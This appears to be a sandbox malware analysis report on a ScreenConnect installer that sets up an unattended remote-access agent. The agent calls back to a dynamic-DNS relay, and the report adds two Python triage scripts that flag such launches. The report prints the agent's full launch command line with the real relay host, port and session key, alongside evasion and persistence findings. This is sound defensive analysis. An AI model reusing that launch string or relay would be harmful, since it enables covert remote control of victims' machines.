                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2317141304.000001FE46502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2314262728.000001FE4642B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.2313032034.00000000016D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmM
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

Source: 0.0.Support.ClientSetup.exe.11778ec.1.raw.unpack, Program.cs; Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.cs; Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: C:\Users\user\Desktop\Support.ClientSetup.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"
Source: unknown; Process created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a9232c38f7080cfd)\screenconnect.clientservice.exe" "?e=access&y=guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=bgiaaackaabsu0exaagaaaeaaqbxzlpqh5kocp8cjbkktck5cqkcoz1k1jpbkgoox2untnea0kbsjdhihm6awc3b94odgxip4bb3wztv%2bjzdrevsnjwv79ysvcwzt5y1uopq5ercoziq9tchhj%2fdfqkghg%2fdkh8j%2brvdsv1rscnvosc6drlnvqj%2bn3r4mz%2fwwir4lxhocknshhcsdo6lbqtdrpsir%2fwv9gauxfgi2d%2bsp4rrrbfakpm2cyrpimchkea3ahkqy3om2oxn5%2bjcdfs6u9visbmf5vwqjogdg1gykn2bckn6fqqkj8qoha84kuid00fcep90jriw7aujprfff09vlweqobl%2bxeri6rnkx3nz&c=online&c=online&c=online&c=&c=&c=&c=&c="
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr; Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr; Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Support.ClientSetup.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe; Queries volume information: C: VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe; Code function: 9_2_00007FF9CC3B3642 CreateNamedPipeW,9_2_00007FF9CC3B3642
Source: C:\Users\user\Desktop\Support.ClientSetup.exe; Code function: 0_2_05F42D07 RtlGetVersion,0_2_05F42D07
Source: C:\Users\user\Desktop\Support.ClientSetup.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
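The process-creation row above carries everything a responder needs to triage this install: the ScreenConnect client receives its relay host (h=), relay port (p=), session type (e=), role (y=) and session ID (s=) as a query string in its first argument, and here the relay is a dynamic-DNS name (fmt2as.ddns.net) with e=access, i.e. a persistent unattended-access agent rather than a one-off support session. The script below is an added example and not part of the Joe Sandbox report or of ConnectWise's code. It parses such command lines as they appear in process-creation telemetry and flags the traits worth escalating. The field meanings are my reading of the launch string, the dynamic-DNS suffix list is an assumed, non-exhaustive list, and the sample events are constructed: the first mirrors the row above with the long k= value shortened, the others are made up.

```python
"""Triage of ScreenConnect client launch parameters found in process-creation command lines.

Added example; not from the Joe Sandbox report and not ConnectWise code. Assumptions
(mine, for illustration): the field meanings in ScreenConnectLaunch, the dynamic-DNS
suffix list, the default relay ports, and the constructed events in SAMPLE_EVENTS.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Relay hosts on these providers deserve a second look: anyone can obtain such a name
# without registering a domain. Assumed list, not exhaustive.
DYNAMIC_DNS_SUFFIXES = (
    "ddns.net", "no-ip.com", "no-ip.org", "hopto.org", "zapto.org",
    "duckdns.org", "dynu.net", "sytes.net",
)
DEFAULT_RELAY_PORTS = {8041, 443}  # 8041 is the ScreenConnect relay default; 443 is common behind proxies

QUOTED_ARG = re.compile(r'"([^"]*)"')


@dataclass
class ScreenConnectLaunch:
    exe: str
    session_type: str    # e=  access | support | meeting
    process_type: str    # y=  guest | host
    relay_host: str      # h=
    relay_port: int      # p=
    session_id: str      # s=
    custom_props: list   # c= (repeated): free-form fields set by the server owner
    flags: list = field(default_factory=list)


def _first(q, key):
    return q.get(key, [""])[0]


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _assess(launch):
    """Return the list of triage flags for one launch."""
    flags = []
    host = launch.relay_host
    if any(host == s or host.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES):
        flags.append("dynamic-dns-relay")
    if _is_ip(host):
        flags.append("raw-ip-relay")
    if launch.relay_port and launch.relay_port not in DEFAULT_RELAY_PORTS:
        flags.append("non-default-relay-port")
    if launch.session_type == "access":
        flags.append("unattended-access")  # persistent agent, not a one-off support session
    return flags


def parse_launch(cmdline):
    """Parse one command line; return a ScreenConnectLaunch, or None if it is not a client launch."""
    args = QUOTED_ARG.findall(cmdline)
    if len(args) < 2 or not args[0].lower().endswith("screenconnect.clientservice.exe"):
        return None
    if not args[1].startswith("?"):
        return None
    q = parse_qs(args[1][1:], keep_blank_values=True)
    try:
        port = int(_first(q, "p") or 0)
    except ValueError:
        port = 0
    launch = ScreenConnectLaunch(
        exe=args[0],
        session_type=_first(q, "e").lower(),
        process_type=_first(q, "y").lower(),
        relay_host=_first(q, "h").lower(),
        relay_port=port,
        session_id=_first(q, "s"),
        custom_props=[c for c in q.get("c", []) if c],
    )
    launch.flags = _assess(launch)
    return launch


# Constructed sample events. The first mirrors the process-creation row in the report,
# with the k= value shortened; the other two are made up.
SAMPLE_EVENTS = [
    r'"c:\program files (x86)\screenconnect client (a9232c38f7080cfd)\screenconnect.clientservice.exe" '
    r'"?e=access&y=guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40'
    r'&k=bgiaaackaabsu0exaagaaaeaaqbxzlpq%2bn3r4mz%2fwwir4lxhocknshhcsdo6lbqtdrpsir'
    r'&c=online&c=online&c=online&c=&c=&c=&c=&c="',
    r'"C:\Program Files (x86)\ScreenConnect Client (1234567890abcdef)\ScreenConnect.ClientService.exe" '
    r'"?e=Support&y=Guest&h=remote.example-msp.com&p=443&s=5f2c1b7e-0000-4000-8000-000000000001&k=abc&c=helpdesk"',
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
]


def triage(events):
    """Run the parser over command lines; return (relay host, session type, flags) per client launch."""
    results = []
    for line in events:
        launch = parse_launch(line)
        if launch is not None:
            results.append((launch.relay_host, launch.session_type, launch.flags))
    return results


if __name__ == "__main__":
    for host, kind, flags in triage(SAMPLE_EVENTS):
        print(f"{host:28} {kind:8} {', '.join(flags) or 'no flags'}")
```

On the report's own launch string the parser returns two flags, dynamic-dns-relay and unattended-access; the constructed MSP-style launch on port 443 returns none. The session ID and relay host are the values to pivot on in network telemetry (the report's port 8041 traffic) and in the ScreenConnect service's install directory name.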

                                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\msiexec.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: svchost.exe, 00000010.00000002.2317723634.0000018BE3902000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000010.00000002.2317723634.0000018BE3902000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe; WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: Yara match; File source: Support.ClientSetup.exe, type: SAMPLE
Source: Yara match; File source: 0.2.Support.ClientSetup.exe.5fc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.ScreenConnect.WindowsClient.exe.2dafa18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.ScreenConnect.WindowsClient.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Support.ClientSetup.exe.5fc0000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.Support.ClientSetup.exe.cf5db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.Support.ClientSetup.exe.c463d4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.ScreenConnect.WindowsClient.exe.34dfa58.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.Support.ClientSetup.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1069609177.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Support.ClientSetup.exe PID: 6924, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 6168, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6504, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6568, type: MEMORYSTR
Source: Yara match; File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DFD73F95F8E305E1F6.TMP, type: DROPPED
Source: Yara match; File source: C:\Windows\Temp\~DF22578DDE847BC16D.TMP, type: DROPPED
Source: Yara match; File source: C:\Config.Msi\3b7ed6.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI8185.tmp, type: DROPPED
MITRE ATT&CK Matrix (the matrix grid was flattened by extraction; rebuilt here as the techniques the matrix marks for this sample, grouped by tactic, with the count the matrix shows beside each technique)

Reconnaissance: no marked technique
Resource Development: no marked technique
Initial Access: Valid Accounts (1), Replication Through Removable Media (1)
Execution: Windows Management Instrumentation (41), Native API (1), Command and Scripting Interpreter (12)
Persistence: DLL Side-Loading (1), DLL Search Order Hijacking (1), Component Object Model Hijacking (1), Valid Accounts (1), Windows Service (2), Bootkit (1)
Privilege Escalation: DLL Side-Loading (1), DLL Search Order Hijacking (1), Component Object Model Hijacking (1), Valid Accounts (1), Access Token Manipulation (1), Windows Service (2), Process Injection (13)
Defense Evasion: Disable or Modify Tools (21), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1), DLL Search Order Hijacking (1), File Deletion (1), Masquerading (21), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (71), Process Injection (13), Hidden Users (1), Bootkit (1), Rundll32 (1)
Credential Access: no marked technique
Discovery: Peripheral Device Discovery (11), File and Directory Discovery (1), System Information Discovery (55), Security Software Discovery (61), Process Discovery (2), Virtualization/Sandbox Evasion (71)
Lateral Movement: no marked technique
Collection: Archive Collected Data (11)
Command and Control: Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (11)
Exfiltration: no marked technique
Impact: no marked technique
Behavior Graph (ID 1568673, sample Support.ClientSetup.exe, start date 04/12/2024, architecture WINDOWS, score 50), rebuilt as a process tree from the graph's node and edge dump. Numbers in parentheses after a process name are the per-process counters the graph attaches to that node (created registry values and files), kept in the graph's order.

Start
  signatures: Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; .NET source code references suspicious native API functions; 5 other signatures
  DNS: fmt2as.ddns.net (signature: Uses dynamic DNS services)
  -> msiexec.exe (94, 51)
       dropped: ScreenConnect.Wind...dentialProvider.dll (PE32+); C:\...\ScreenConnect.ClientService.exe (PE32); C:\Windows\Installer\MSI837B.tmp (PE32); 9 other files (none is malicious)
       signatures: Enables network access during safeboot for specific services; Modifies security policies related information
       -> msiexec.exe
            -> rundll32.exe (10)
                 dropped: C:\Users\user\...\ScreenConnect.Windows.dll (PE32); C:\...\ScreenConnect.InstallerActions.dll (PE32); C:\Users\user\...\ScreenConnect.Core.dll (PE32); 4 other files (none is malicious)
                 signature: Contains functionality to hide user accounts
       -> msiexec.exe (1)
       -> msiexec.exe
  -> ScreenConnect.ClientService.exe (2, 5)
       network: fmt2as.ddns.net 194.59.31.27, 49707, 8041, COMBAHTONcombahtonGmbHDE Germany
       signatures: Reads the Security eventlog; Reads the System eventlog
       -> ScreenConnect.WindowsClient.exe (2)
            signature: Contains functionality to hide user accounts
       -> ScreenConnect.WindowsClient.exe (2)
  -> Support.ClientSetup.exe (5)
       signature: Contains functionality to hide user accounts
       -> msiexec.exe (6)
            dropped: C:\Users\user\AppData\Local\...\MSI7753.tmp (PE32)
  -> 6 other processes
       network: 127.0.0.1 unknown unknown
       signature: Changes security center settings (notifications, updates, antivirus, firewall)
       -> MpCmdRun.exe
            -> conhost.exe
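Added example (not part of the Joe Sandbox report and not ConnectWise code): a Python triage check for the pattern the graph above shows, a ScreenConnect client service whose relay is a dynamic-DNS host (fmt2as.ddns.net on port 8041) rather than the relay an organisation actually uses. The install path, relay host and port in the first sample come from the report; the layout of the service command line (a quoted query string with e=, y=, h= and p= fields), the dynamic-DNS suffix list and the allowlist are assumptions, and all sample command lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Assumption: a short illustrative list of dynamic-DNS suffixes; extend for your estate.
DYNAMIC_DNS_SUFFIXES = ("ddns.net", "no-ip.org", "no-ip.com", "dyndns.org", "duckdns.org", "hopto.org")

# Assumption: relay hosts a hypothetical organisation expects its own ScreenConnect agents to use.
ALLOWED_RELAY_SUFFIXES = ("relay.example-msp.com",)

# Assumption about the client's parameterisation: the service binary is followed by one
# quoted query string whose h= and p= fields carry the relay host and port.
_SERVICE_RE = re.compile(
    r'"(?P<exe>[^"]*ScreenConnect\.ClientService\.exe)"\s*"\?(?P<query>[^"]*)"',
    re.IGNORECASE,
)


def _has_suffix(host: str, suffixes) -> bool:
    """True if host equals one of the suffixes or is a subdomain of it."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def parse_service_cmdline(cmdline: str):
    """Extract exe path, relay host/port and session type from a ScreenConnect
    client service command line; None when the line is not one."""
    m = _SERVICE_RE.search(cmdline)
    if m is None:
        return None
    q = parse_qs(m.group("query"), keep_blank_values=True)
    port_text = q.get("p", ["0"])[0]
    return {
        "exe": m.group("exe"),
        "relay_host": q.get("h", [""])[0].lower(),
        "relay_port": int(port_text) if port_text.isdigit() else 0,
        "session_type": q.get("e", [""])[0],
    }


def assess(cmdline: str, allowed=ALLOWED_RELAY_SUFFIXES):
    """Return the parsed fields plus a list of reasons the install looks suspicious
    (empty list = expected relay); None for non-ScreenConnect command lines."""
    info = parse_service_cmdline(cmdline)
    if info is None:
        return None
    reasons = []
    if _has_suffix(info["relay_host"], DYNAMIC_DNS_SUFFIXES):
        reasons.append("dynamic DNS relay host")
    if not _has_suffix(info["relay_host"], allowed):
        reasons.append("relay host not in allowlist")
    info["reasons"] = reasons
    info["suspicious"] = bool(reasons)
    return info


# Constructed sample input: the first line reuses the install path, relay host and
# port from the report; the other two are invented for contrast.
SAMPLE_CMDLINES = [
    r'"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=00000000-0000-0000-0000-000000000000&k="',
    r'"C:\Program Files (x86)\ScreenConnect Client (0123456789abcdef)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=agents.relay.example-msp.com&p=443&s=00000000-0000-0000-0000-000000000000&k="',
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
]


def triage(cmdlines=SAMPLE_CMDLINES):
    """Assess every line and return only the ScreenConnect ones."""
    return [r for r in (assess(c) for c in cmdlines) if r is not None]


if __name__ == "__main__":
    for r in triage():
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{verdict:10} {r['relay_host']}:{r['relay_port']}  {'; '.join(r['reasons'])}")
```

Feed it the ImagePath of every service named like ScreenConnect Client (...) from an endpoint inventory; the allowlist is the part to tune per organisation, since a self-hosted ScreenConnect relay on a non-443 port is normal for that organisation and suspicious everywhere else.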

Source | Detection | Scanner | Label | Link
Support.ClientSetup.exe | 22% | ReversingLabs | Win32.PUA.ConnectWise |

Source | Detection | Scanner | Label | Link
